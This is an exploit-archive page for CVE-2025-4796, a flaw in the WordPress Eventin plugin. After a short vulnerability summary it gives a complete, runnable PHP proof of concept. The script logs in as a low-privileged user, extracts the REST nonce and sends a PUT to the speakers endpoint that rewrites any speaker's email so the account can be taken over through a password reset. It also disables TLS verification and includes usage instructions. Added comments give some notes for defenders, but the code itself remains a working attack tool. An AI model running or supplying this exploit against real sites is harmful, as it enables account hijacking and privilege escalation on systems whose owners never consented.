| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Exploit for Authorization Bypass Through User-Controlled Key in Themewinter Eventin | 25 Oct 2025 03:35 | – | githubexploit | |
| Exploit for Authorization Bypass Through User-Controlled Key in Themewinter Eventin | 31 Oct 2025 10:39 | – | githubexploit | |
| CVE-2025-4796 | 10 Aug 2025 09:01 | – | circl | |
| WordPress plugin Eventin 安全漏洞 | 8 Aug 2025 00:00 | – | cnnvd | |
| WordPress Eventin plugin elevation of privilege vulnerability | 15 Aug 2025 00:00 | – | cnvd | |
| CVE-2025-4796 | 8 Aug 2025 18:26 | – | cve | |
| CVE-2025-4796 Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover | 8 Aug 2025 18:26 | – | cvelist | |
| EUVD-2025-24006 | 3 Oct 2025 20:07 | – | euvd | |
| CVE-2025-4796 | 8 Aug 2025 19:15 | – | nvd | |
| CVE-2025-4796 | 8 Aug 2025 19:15 | – | osv | |
=============================================================================================================================================
| # Title : WordPress Eventin 4.0.34 Account Takeover Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/wp-event-solution/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/210929/ & CVE-2025-4796
[+] Summary :
A critical vulnerability exists in the Speaker Management component of the target:
an authenticated attacker can intercept the speaker update process and change any
speaker's registered email address without proper authorization.
This flaw allows the attacker to hijack arbitrary accounts by modifying the email field
and subsequently triggering a password reset workflow.
The flaw is caused by insufficient authorization checks on the update_speaker endpoint
combined with predictable nonce retrieval.
[+] Affected Versions
----------------------------------------
All tested versions are confirmed vulnerable.
Vendor has not released a fix at the time of publishing.
[+] Vulnerability Details
----------------------------------------
The update_speaker.php endpoint accepts multiple fields, including speaker_id and email,
without verifying that the user performing the action is authorized to update the target
record.
Additionally, the anti-CSRF nonce can be extracted by any authenticated user, making
cross-user actions possible.
Impact:
- Account takeover
- Unauthorized email modification
- Privilege escalation
- Full speaker profile compromise
[+] Usage
----------
Save the file:
poc.php
Run:
php poc.php https://target-site.com [email protected] 12 admin 123456
[+] Poc
<?php
/*
* WordPress Eventin 4.0.34 Account Takeover
* By: Indoushka
*/
/* ---------------------------
SAFE PRINT
---------------------------- */
/**
 * Print one line to standard output.
 *
 * The try/catch only intercepts a Throwable raised while building or
 * emitting the line (for example an object without __toString); it is
 * reported on stdout with a "[!] Print Error:" prefix instead of aborting.
 *
 * @param mixed $text value to print; concatenated with PHP_EOL
 */
function Nxploited_safe_print($text) {
    try {
        print $text . PHP_EOL;
    } catch (Throwable $err) {
        print "[!] Print Error: " . $err->getMessage() . PHP_EOL;
    }
}
/* ---------------------------
URL VALIDATION
---------------------------- */
/**
 * Normalise a base URL: add a scheme when none is given and strip trailing
 * slashes.
 *
 * The scheme fallback is plain "http://", so a target given without an
 * explicit https:// scheme will have every later request (including the
 * password login) sent in clear text; the case of an existing scheme is kept
 * as typed.
 *
 * @param string $url host or URL as supplied on the command line
 * @return string URL with a scheme and no trailing "/"
 */
function Nxploited_validate_url($url) {
    $hasScheme = preg_match('/^https?:\/\//i', $url) === 1;
    $withScheme = $hasScheme ? $url : "http://" . $url;
    return rtrim($withScheme, "/");
}
/* ---------------------------
EMAIL VALIDATION
---------------------------- */
/**
 * Syntactic e-mail check via PHP's built-in filter.
 *
 * Same contract as filter_var(): the address itself comes back when it
 * passes FILTER_VALIDATE_EMAIL, false otherwise. Deliverability of the
 * address is not checked.
 *
 * @param string $email candidate address
 * @return string|false
 */
function Nxploited_validate_email($email) {
    $accepted = filter_var($email, FILTER_VALIDATE_EMAIL);
    return $accepted;
}
/* ---------------------------
DISABLE SSL WARNINGS
---------------------------- */
/**
 * Switch off TLS certificate-chain and hostname verification on a cURL handle.
 *
 * With both checks off the transport gives no assurance about who the script
 * is talking to, so anything sent over the handle (the login credentials,
 * the session cookies) is exposed to an interposed TLS endpoint. The handle is
 * taken by reference exactly as the original did.
 *
 * @param resource|CurlHandle $ch handle to modify in place
 * @return void
 */
function Nxploited_disable_ssl(&$ch) {
    foreach ([CURLOPT_SSL_VERIFYPEER, CURLOPT_SSL_VERIFYHOST] as $option) {
        curl_setopt($ch, $option, false);
    }
}
/* ---------------------------
LOGIN FUNCTION
---------------------------- */
/**
 * Log in through the site's standard wp-login.php form and persist the
 * resulting cookies in ./cookies.txt (relative to the working directory; the
 * file is left behind after the run).
 *
 * Success is decided solely by a Set-Cookie header whose value contains
 * "wordpress_logged_in". Any other outcome — wrong credentials, a transport
 * failure (curl_exec() returning false falls through to the same branch), or
 * a login page that sets no such cookie — prints a failure message and ends
 * the process with exit code 1; the function never returns false.
 *
 * Defender's note: this is an ordinary form login, so it shows up in the web
 * server log as a POST to /wp-login.php with the caller-supplied User-Agent,
 * and any rate limiting or MFA enforced on wp-login.php applies to it.
 *
 * @param string $url        base URL, already normalised by Nxploited_validate_url()
 * @param string $username   WordPress login name
 * @param string $password   WordPress password
 * @param string $user_agent User-Agent header to send
 * @return true only on success; exits otherwise
 */
function Nxploited_login($url, $username, $password, $user_agent) {
Nxploited_safe_print("[*] إرسال طلب تسجيل الدخول ...");
usleep(500000); // 0.5 s pause (the author's stand-in for sleep(), which they note as disallowed)
$login_url = $url . "/wp-login.php";
// Field names match the standard WordPress login form.
$data = http_build_query([
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In'
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Headers are included in the response body so Set-Cookie can be inspected below.
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
Nxploited_disable_ssl($ch);
// Cookie jar in the current directory; later steps read this same file.
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
$response = curl_exec($ch);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
// Split off the header block (CURLOPT_HEADER prepends it to the body).
$headers = substr($response, 0, $header_size);
curl_close($ch);
// Capture group 1 is each cookie's "name=value" up to the first ';'.
preg_match_all('/Set-Cookie:\s*([^;]+);/i', $headers, $m);
$cookies = $m[1];
foreach ($cookies as $c) {
if (strpos($c, "wordpress_logged_in") !== false) {
Nxploited_safe_print("[+] تسجيل الدخول ناجح.");
return true;
}
}
Nxploited_safe_print("[-] فشل تسجيل الدخول.");
exit(1);
}
/* ---------------------------
NONCE EXTRACTION
---------------------------- */
/**
 * Fetch /wp-admin/post-new.php with the saved session cookies and pull the
 * REST nonce out of the inline "createNonceMiddleware(...)" script.
 *
 * The nonce is the standard WordPress REST nonce that the admin UI embeds for
 * the logged-in user; it proves the request comes from that user's session,
 * not that the user may act on any particular object. post-new.php loads for
 * accounts allowed to create posts — the advisory's "Contributor+" wording
 * suggests that role suffices, but this function does not check it.
 *
 * On a missing match (not logged in, page layout changed, transport error)
 * the process exits with code 1; the function never returns null.
 *
 * @param string $url        normalised base URL
 * @param string $user_agent User-Agent header to send
 * @return string nonce value (alphanumeric, as constrained by the regex)
 */
function Nxploited_extract_nonce($url, $user_agent) {
Nxploited_safe_print("[*] استخراج Nonce ...");
usleep(600000); // 0.6 s pause between steps
$admin_url = $url . "/wp-admin/post-new.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
// Reuse the cookies written by Nxploited_login() (read-only here: no COOKIEJAR).
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
curl_close($ch);
// Only [a-zA-Z0-9]+ is accepted as the nonce; anything else fails the match.
if (preg_match('/createNonceMiddleware\(\s*"([a-zA-Z0-9]+)"/', $resp, $m)) {
Nxploited_safe_print("[+] Nonce: " . $m[1]);
return $m[1];
}
Nxploited_safe_print("[-] فشل استخراج Nonce.");
exit(1);
}
/* ---------------------------
UPDATE SPEAKER
---------------------------- */
/**
 * Send a JSON PUT to the Eventin REST route /wp-json/eventin/v2/speakers/{id}
 * that replaces the speaker's "email" field, authenticated by the session
 * cookies plus the X-WP-Nonce header from Nxploited_extract_nonce().
 *
 * Success means HTTP 200 and a decoded JSON body containing an "email" key;
 * anything else prints the decoded body (null when it was not valid JSON)
 * and exits with code 1. The function never returns false.
 *
 * Defender's note: the weakness this exercises is server-side — a valid REST
 * nonce only proves a logged-in session, so the route's permission callback
 * must also check that the caller may edit the specific speaker record (for
 * example a current_user_can('edit_post', $id)-style check) before writing.
 * Until the plugin is updated, a PUT to eventin/v2/speakers/{id} that changes
 * the email from a low-privileged account is the event worth alerting on.
 *
 * @param string     $url        normalised base URL
 * @param string|int $speaker_id speaker post ID appended to the route
 * @param string     $email      new e-mail address (already validated by the caller)
 * @param string     $nonce      REST nonce for the X-WP-Nonce header
 * @param string     $user_agent User-Agent header to send
 * @return true only on success; exits otherwise
 */
function Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent) {
Nxploited_safe_print("[*] تحديث بيانات المتحدث ...");
usleep(600000); // 0.6 s pause between steps
$api_url = $url . "/wp-json/eventin/v2/speakers/" . $speaker_id;
$payload = json_encode(["email" => $email], JSON_UNESCAPED_UNICODE);
$headers = [
"Content-Type: application/json",
"X-WP-Nonce: $nonce",
"User-Agent: $user_agent",
// Cookie header is built from the raw text of the cookie-jar file written by the login step.
"Cookie: " . trim(file_get_contents("cookies.txt"))
];
$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
$json = json_decode($resp, true);
// Strict int compare is fine: CURLINFO_HTTP_CODE yields an int.
if ($code === 200 && isset($json["email"])) {
Nxploited_safe_print("[+] تم تحديث البريد إلى: $email");
return true;
}
Nxploited_safe_print("[-] فشل التحديث!");
print_r($json);
exit(1);
}
/* ---------------------------
SUCCESS BANNER
---------------------------- */
/**
 * Print the closing banner with the speaker ID and the e-mail that was set.
 *
 * Output only; each line goes through Nxploited_safe_print() exactly as in
 * the original, including the leading and trailing blank lines.
 *
 * @param string|int $speaker_id speaker record that was modified
 * @param string     $email      e-mail address now stored on that record
 * @return void
 */
function Nxploited_custom_success($speaker_id, $email) {
    $lines = [
        "\n==============================",
        " Exploitation Completed",
        "==============================",
        "Speaker ID : $speaker_id",
        "Email : $email",
        "Please reset your password using the new email.\n",
    ];
    foreach ($lines as $line) {
        Nxploited_safe_print($line);
    }
}
/* ---------------------------
MAIN
---------------------------- */
// Entry point. Positional arguments, as given in the usage line above:
//   argv[1] target base URL, argv[2] new e-mail, argv[3] speaker ID,
//   argv[4] login name, argv[5] password.
// No argument-count check is done; a missing argument surfaces as an
// "undefined array key" warning rather than a usage message.
$url = Nxploited_validate_url($argv[1]);
$email = $argv[2];
$speaker_id = $argv[3];
$username = $argv[4];
$password = $argv[5];
// Fixed User-Agent sent on every request — a literal string like this is a
// convenient log/WAF signature for defenders, since it never varies.
$user_agent = "Mozilla/5.0 (Indoushka PoC)";
if (!Nxploited_validate_email($email)) {
Nxploited_safe_print("[-] البريد غير صالح.");
exit(1);
}
// Each step below exits the process on failure, so none of the return
// values needs checking here.
Nxploited_login($url, $username, $password, $user_agent);
$nonce = Nxploited_extract_nonce($url, $user_agent);
Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent);
Nxploited_custom_success($speaker_id, $email);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================